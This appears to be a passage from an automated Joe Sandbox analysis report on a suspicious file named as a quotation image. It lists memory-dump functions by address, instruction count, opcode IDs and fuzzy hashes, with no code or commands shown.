                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bbb001d2390075c70ad5e86d8f7af112730320d4723e09e251b89e980375c53
                          • Instruction ID: cf3aeb411dd81dbd82dd5be08d4e8b974cd1925b4002a4a08c04991b29cf936e
                          • Opcode Fuzzy Hash: 4bbb001d2390075c70ad5e86d8f7af112730320d4723e09e251b89e980375c53
                          • Instruction Fuzzy Hash: 24E08C30C06208EFEB80EFB8D04469CBFB4AB08205F2004B9880896280E631DA40CB41
                          Function 06508410 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9286b24ef6afaaeb9d6696b8f868de6e64c1a49135ec8f722012221f9290cb3a
                          • Instruction ID: 7644fddd08780f85fe9d333f732b0c4f1a8e185f6228a6789d946952f0a2d4b1
                          • Opcode Fuzzy Hash: 9286b24ef6afaaeb9d6696b8f868de6e64c1a49135ec8f722012221f9290cb3a
                          • Instruction Fuzzy Hash: C0E01272C06108EBCB81EFF89504A9E77B8EF55310F4045A9950597150E9758B049B91
                          Function 06509820 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 382c1568365f58a269d3be051d0077f0b29d7bba58ae205e762ae9736902c64c
                          • Instruction ID: 2676f4d148c9e42f8c00aaa088dd2f885b584cb9277799cd9c3624659ace6d84
                          • Opcode Fuzzy Hash: 382c1568365f58a269d3be051d0077f0b29d7bba58ae205e762ae9736902c64c
                          • Instruction Fuzzy Hash: 26E0C234D09108DBCB54DF94E5409ACBBB4FF46304F10D1A8DC4817385C631DE02DB80
                          Function 0141D280 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd4295422d95ef4276fb9eed7a51bdb5d62e7b38c62ce122fcb3fcb6308ed367
                          • Instruction ID: df838cb5f1f5f77612a7f4249319c31b0576f5f3df294a83e61d80be5a7217ca
                          • Opcode Fuzzy Hash: fd4295422d95ef4276fb9eed7a51bdb5d62e7b38c62ce122fcb3fcb6308ed367
                          • Instruction Fuzzy Hash: 8CE01271902108EFCB51EFF8D90969E7FF8EB46221F1045A5D50997154EE728A009B95
                          Function 06549420 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2788a8e486cfb3685ca80827729a3f032873f27fcb62ddcb2fb55401eb2fff34
                          • Instruction ID: d06ab0b0b4d452533b667324b2165501d0700672b5540ae9cf1cef029f7f292c
                          • Opcode Fuzzy Hash: 2788a8e486cfb3685ca80827729a3f032873f27fcb62ddcb2fb55401eb2fff34
                          • Instruction Fuzzy Hash: 4DE01270A4120DEFCB00DFB4E98466DBBF9EB49200F508999D90897241DA356F019B95
                          Function 06546888 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1bf8f4b8a664285371c668e460a7c1c4e30b394bdc19aa5a002506b2289d638
                          • Instruction ID: ba9cddc59e6d8b6087b1f2354a65fb26297f619e80db743c1c9f562da005da23
                          • Opcode Fuzzy Hash: c1bf8f4b8a664285371c668e460a7c1c4e30b394bdc19aa5a002506b2289d638
                          • Instruction Fuzzy Hash: 47D05B34D06108DBCB54EFA4E5486ADBBB8BB4B305F1091E8D80423244C7705E55DB85
                          Function 065493D8 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4a1ff5815f04fa35dc3945ab19d51120d4de50bb3ae3626f3e1ff7b64f06632
                          • Instruction ID: 03cb71e78678ed8852a5149061ac744e4e4de9b47160ff9d9c616b329cc74906
                          • Opcode Fuzzy Hash: f4a1ff5815f04fa35dc3945ab19d51120d4de50bb3ae3626f3e1ff7b64f06632
                          • Instruction Fuzzy Hash: 1EE01270A0220CEFCB40DFA8E50069D77F9EB44214F504599D80CD3301DA356F409795
                          Function 065B0E28 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 055de5b53c5ff0a466344d937730af90c523f52a851b87a20937d3301e3bd50c
                          • Instruction ID: 33235c64165a5fa272172fbe0cf4d99457a85c3df11ea128b1db797e4015cf35
                          • Opcode Fuzzy Hash: 055de5b53c5ff0a466344d937730af90c523f52a851b87a20937d3301e3bd50c
                          • Instruction Fuzzy Hash: B1E07570805259CFEB60CF54E448BDEBAB4BB04315F14A495D40A7B291C37459C5DF14
                          Function 06507C70 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cecaa6533b8c8010fc761796dbcc2d5e8c7caa245741dce9766336e94d451e10
                          • Instruction ID: 1e8a3b3df9c5e2240d3b80576fa530977da6b61c411f21982e8b86429018b65a
                          • Opcode Fuzzy Hash: cecaa6533b8c8010fc761796dbcc2d5e8c7caa245741dce9766336e94d451e10
                          • Instruction Fuzzy Hash: 8DD0A73050A108DFD7C4CB94E540A68B7BCFB4A314F10909C980957381CA72EE02DB80
                          Function 06546E10 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 004815998cc64df401a8b60afef5bcc4b4e1351bf5f0d74a33a5640587ad287c
                          • Instruction ID: 3b31d772cf3ef7d239b6642c545e2545a65bc2c4279f1ccc631519f3502a9d79
                          • Opcode Fuzzy Hash: 004815998cc64df401a8b60afef5bcc4b4e1351bf5f0d74a33a5640587ad287c
                          • Instruction Fuzzy Hash: B2E01274A5012EDFD734DF14E855BAC7771FB8A301F5040D5D40963244DA341D85CF60
                          Function 06546ED1 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b3c11521d110fdb0c230eb92a5342a8088b26fbb0e6fc80629af10e0443a8016
                          • Instruction ID: 0789d87d239d3c5744c19d44ccfb92d4eee3f66efec6cc5480b2d6ecd3d6827b
                          • Opcode Fuzzy Hash: b3c11521d110fdb0c230eb92a5342a8088b26fbb0e6fc80629af10e0443a8016
                          • Instruction Fuzzy Hash: AFE09A74A143289FCB55DF18D85479D77B2FB8D310F104598E54967245CB341EC4CF15
                          Function 065474A1 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4087d4cb7ec8e3069be1a73e4b9f872dc9721fcedc01fb2757c86ee792660787
                          • Instruction ID: 1d40190a41e002f55cb8cad54486c81732c695c4e9519419a802ee784d865e5c
                          • Opcode Fuzzy Hash: 4087d4cb7ec8e3069be1a73e4b9f872dc9721fcedc01fb2757c86ee792660787
                          • Instruction Fuzzy Hash: 1FE0E570A112289BD710EF68ED68B9C77B1FB89205F0001D9D109A7384CA381DC4CF20
                          Function 06546D80 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8017dd22b34be017bec42fb6432837326b699212abd3a0590e07b988e4127a50
                          • Instruction ID: 707a90f153abb181452a51c5185b3d0c553626c685122b154c42194c9d98524d
                          • Opcode Fuzzy Hash: 8017dd22b34be017bec42fb6432837326b699212abd3a0590e07b988e4127a50
                          • Instruction Fuzzy Hash: FEE01A74A201289BCB24DF18D89479DB7B1FB89340F2085D9D50AB3244CB781EC4CF21
                          Function 065471D9 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b60d237dcb9a1a53d1e364d6d8b43b7702a3c0be0f57c9aff6b83eec459ff89
                          • Instruction ID: baeaa3b97b4d030ff86d02685dfa4961af6d16efe6241cb4e1aa8a5ec6705165
                          • Opcode Fuzzy Hash: 5b60d237dcb9a1a53d1e364d6d8b43b7702a3c0be0f57c9aff6b83eec459ff89
                          • Instruction Fuzzy Hash: C0E01A74A212289FD724DF68D84479DBB72FB8E301F408099D50A77244CB341E88CF51
                          Function 065B2900 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b51d5da29f491236ee39846602e2b66e4160dcc2485005aca12249385c94f926
                          • Instruction ID: 1ec360c94ed3ec3b1039fac36f9ce9ec7e82a5d57a993b9b51f30592adb5ade8
                          • Opcode Fuzzy Hash: b51d5da29f491236ee39846602e2b66e4160dcc2485005aca12249385c94f926
                          • Instruction Fuzzy Hash: 7FD0A77041B208EFC7D4DB6694046B8737CEB02206F1014ACD50817200CA718B40DB90
                          Function 06504B21 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4294abdba2346ac56f0fd4e01645533938456784acbcf34843d2e9681722acef
                          • Instruction ID: a7a7f75dc35cd90bed6ee8c998513655dd295f9e9247eaa9dd78725fd061f913
                          • Opcode Fuzzy Hash: 4294abdba2346ac56f0fd4e01645533938456784acbcf34843d2e9681722acef
                          • Instruction Fuzzy Hash: 4FC012B900A6406FE34216108D06F723E24D746601F110186F2C58506294625C178B73
                          Function 01411D60 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 55002afe36676bf34e2b0e3dbcc27e436c9e34a28d9c3d56fb70380986d10569
                          • Instruction ID: 1cb3d2eb1c620652ff036b378e61b5d2ad3b78eff845ade155081e0b56ec28d3
                          • Opcode Fuzzy Hash: 55002afe36676bf34e2b0e3dbcc27e436c9e34a28d9c3d56fb70380986d10569
                          • Instruction Fuzzy Hash: 3CD05E70A1120CFFCB05DFA8E90556DBBBDFB44200B5049A9D808D3300EA316F009B94
                          Function 0654AC90 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a4f08854602bc0d315154afad0ca3f1d559ae1e325ebeb285b25c0ceac16e4f
                          • Instruction ID: 3a6b55f9a3d9ad8e3043f71ab821252741edcba8345d3feb4265900e98976dc3
                          • Opcode Fuzzy Hash: 2a4f08854602bc0d315154afad0ca3f1d559ae1e325ebeb285b25c0ceac16e4f
                          • Instruction Fuzzy Hash: 22C012202CA6B02FCB0352600C22BD63F280B03A12F1402C6F0D4CF0C3C249864687E2
                          Function 0684D348 Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 06748ad4da487b909a3aae6c1e9456c7de6f176e9ce19b8724b2d10eb99c078f
                          • Instruction ID: 69fe09a2c3d4f0091f8ed229fd3c48180b3554206a8c11fc5e91a9d5294ab8ac
                          • Opcode Fuzzy Hash: 06748ad4da487b909a3aae6c1e9456c7de6f176e9ce19b8724b2d10eb99c078f
                          • Instruction Fuzzy Hash: 01C02B3004B20CC6C6E03288701C378F3DC8F0B31EF0C7810620C80021D6F08020D760
                          Function 0650848D Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2fea5a04392111edaf2f58d00c4c42df24932f86087d1753d0069997fa6ea821
                          • Instruction ID: dddc87e148af81f6459f9c366a73248fa330e336b092b1348707861297a2754d
                          • Opcode Fuzzy Hash: 2fea5a04392111edaf2f58d00c4c42df24932f86087d1753d0069997fa6ea821
                          • Instruction Fuzzy Hash: E1B01221A0930F96A920C850B492DF8F344A3A316E7482B9BC8AD131401A028937E5C2
                          Function 0141D070 Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7160bf3c60f5136c20b77c773b0068f00263e1acddef736511d89681a192265a
                          • Instruction ID: 34316e5198798a2c8f8e00c6320c27b4733c9543393434137421c3c678d07e65
                          • Opcode Fuzzy Hash: 7160bf3c60f5136c20b77c773b0068f00263e1acddef736511d89681a192265a
                          • Instruction Fuzzy Hash: 75C080704831048FC1E03BDCB50D7543A78AF40276F404121E50C51055CA744440C756
                          Function 01411F30 Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f41e54d0c5004e612f06374cd79f8700de3bb20d55022177693d0c541c8668f
                          • Instruction ID: 2e7de2f7dc91c6b66bfd2e6a2c7c3c6603ede29d7e6c0ab4535c4533b5d31c21
                          • Opcode Fuzzy Hash: 8f41e54d0c5004e612f06374cd79f8700de3bb20d55022177693d0c541c8668f
                          • Instruction Fuzzy Hash: 9EB092313582080AEA6097FAB808726328C9741A18F4000A2B50CC1B06E696E6501240
                          Function 06546F29 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d772c0661bc82ab509225c48694e9454fb581620ca6dbb85b8941c6870783a3
                          • Instruction ID: 469f531a21a3f7631b18e08c1344a1146aa6ac4c9ce0283a70b71a5f227c6599
                          • Opcode Fuzzy Hash: 6d772c0661bc82ab509225c48694e9454fb581620ca6dbb85b8941c6870783a3
                          • Instruction Fuzzy Hash: DCC08CF0218110BFE304AF64F85833D3A21F78B208F108045E0022B2C8CB7C5885CBA0
                          Function 06541150 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e9873fa3ddd8b37eb4a6a4b89330b2af1e3c2c21a801f7f876a0c4a9136d8c18
                          • Instruction ID: faf1859303268809f953247a9f85bcbdd6ee3f2139ee9e349d7abc600c7672b7
                          • Opcode Fuzzy Hash: e9873fa3ddd8b37eb4a6a4b89330b2af1e3c2c21a801f7f876a0c4a9136d8c18
                          • Instruction Fuzzy Hash: 3BD0C970B01218DFEB60DF18EC48B8D77B9FB02304F5096D69189A2254E7701EC4CF02
                          Function 01411DA1 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38c738822dfee4b98dd52b5a41af468ab2a58b46eb56771628cf3ae6f0db2a32
                          • Instruction ID: 20b59ad1339d9f69d9f1e7cca25fae754c43940ae2f091be063baf3f708093a2
                          • Opcode Fuzzy Hash: 38c738822dfee4b98dd52b5a41af468ab2a58b46eb56771628cf3ae6f0db2a32
                          • Instruction Fuzzy Hash: ABC0482054D7C06BEB172BA05D697583F39AF47B0AFAA40C2F6848E1E7D26A4904C336
                          Function 0654D791 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d407955c27638523b0310ca793a159d94d0fd5b94338f388010823c674ff192a
                          • Instruction ID: 667b110d5a7b8f65fbb838f10ce46666677631121293947ccb666416b8aed29f
                          • Opcode Fuzzy Hash: d407955c27638523b0310ca793a159d94d0fd5b94338f388010823c674ff192a
                          • Instruction Fuzzy Hash: DCC08CB2D0D3D0AFC7039330C52C117BF229BE3200B0680FBD0828E01AD2344C11DB56
                          Function 0684F5D8 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                          Function 06503880 Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a5ae842d019a0a44acfc482c954c0d35359c140e1e1aa2cd5b36e5ceb9c1eb09
                          • Instruction ID: a911243fa970e2295a5c34a1a8b15841c69618d89a00d646ec35cb907b1521c4
                          • Opcode Fuzzy Hash: a5ae842d019a0a44acfc482c954c0d35359c140e1e1aa2cd5b36e5ceb9c1eb09
                          • Instruction Fuzzy Hash: A9B09236010208AB8A009A85E808895BB69AB99600700C025B609061128B32A862DBA8

                          Non-executed Functions

                          Function 0654D2F8 Relevance: 2.8, Strings: 2, Instructions: 341COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$,iq
                          • API String ID: 0-33244345
                          • Opcode ID: b3bfa40dfe0fe00599a97e5249e34caa250bac69a207b354830a8b1db2250d1b
                          • Instruction ID: c9f92677dd29abe7801f613b7d93817e5918bf3ce60975f3ced279a23ba062ab
                          • Opcode Fuzzy Hash: b3bfa40dfe0fe00599a97e5249e34caa250bac69a207b354830a8b1db2250d1b
                          • Instruction Fuzzy Hash: BAD11974A016098FDB54EF69C584AADBBF2FF88314F658599E8099B361CB34EC81CF50
                          Function 01418F2B Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: 68582e0a838ef16757e45480572f8e31ccc8d9bf376e635b463490398410d63b
                          • Instruction ID: 255fa62cc94f064349619096aaf3a3457d86eddceaffad080b6764a07ab4613d
                          • Opcode Fuzzy Hash: 68582e0a838ef16757e45480572f8e31ccc8d9bf376e635b463490398410d63b
                          • Instruction Fuzzy Hash: 2C712871A016099FDB49DF6EF84869EBBF7FFC9304F14C52AD0049B268DB7818858B40
                          Function 01418F38 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: dc59b9cde323dbdb71f6a62bad4b1e09d9703ee8edad31adc6a253877497e4b1
                          • Instruction ID: a5419e8a2ef7c16fd9a62adc3837ef9a666c90cd94b6d7a2e0454df7287ef71f
                          • Opcode Fuzzy Hash: dc59b9cde323dbdb71f6a62bad4b1e09d9703ee8edad31adc6a253877497e4b1
                          • Instruction Fuzzy Hash: B4712871A016099FDB48DF6EF84869EBBF7FFC9304F14C529D0089B268EB7819858B50
                          Function 06830040 Relevance: 2.6, Strings: 2, Instructions: 74COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Q$Y
                          • API String ID: 0-1902155107
                          • Opcode ID: 4c607214dcc35c030b5d9f7cf78049c7673eabbd6a033b9d3f24395c258bb47a
                          • Instruction ID: d2791c213d9771d547cd815f570d5762dc2233dacfc42cbc85cf7016f2727ae8
                          • Opcode Fuzzy Hash: 4c607214dcc35c030b5d9f7cf78049c7673eabbd6a033b9d3f24395c258bb47a
                          • Instruction Fuzzy Hash: 2A31E870D056298BEB68CF6ACD4879EFAF6AF88304F04C1FA951CA7214DB704A85DF40
                          Function 06548EC0 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Teeq
                          • API String ID: 0-348098666
                          • Opcode ID: 6dc724dbb9340881a2de845bc506df718b85426f480a779ff4829e50269f6729
                          • Instruction ID: ed36eb33076d4b672e570943f9b5d2216d1f5269e440af9c55a92dc35415f7cb
                          • Opcode Fuzzy Hash: 6dc724dbb9340881a2de845bc506df718b85426f480a779ff4829e50269f6729
                          • Instruction Fuzzy Hash: 97A12474E05218CFEB64DFA9D849B9EBBF2BF89304F1090A9D409AB245DB745D85CF40
                          Function 06548EB0 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
